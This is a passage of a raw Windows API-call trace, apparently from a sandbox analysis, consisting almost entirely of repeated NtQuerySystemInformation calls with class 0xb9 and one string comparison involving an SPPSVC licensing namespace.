ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0287.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x50, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x50, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6d0, Length=0x28, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c740, Length=0x28, ResultLength=0x0) [0287.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0287.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c7c0, Length=0x28, ResultLength=0x0) [0287.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c660, Length=0x20, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c5e0, Length=0x20, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8a0, Length=0x38, ResultLength=0x0) [0287.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c720, Length=0x20, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c6b0, Length=0x20, ResultLength=0x0) [0287.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0287.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x50, ResultLength=0x0) [0287.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x28, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x28, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x38, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x20, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x20, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0287.988] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, 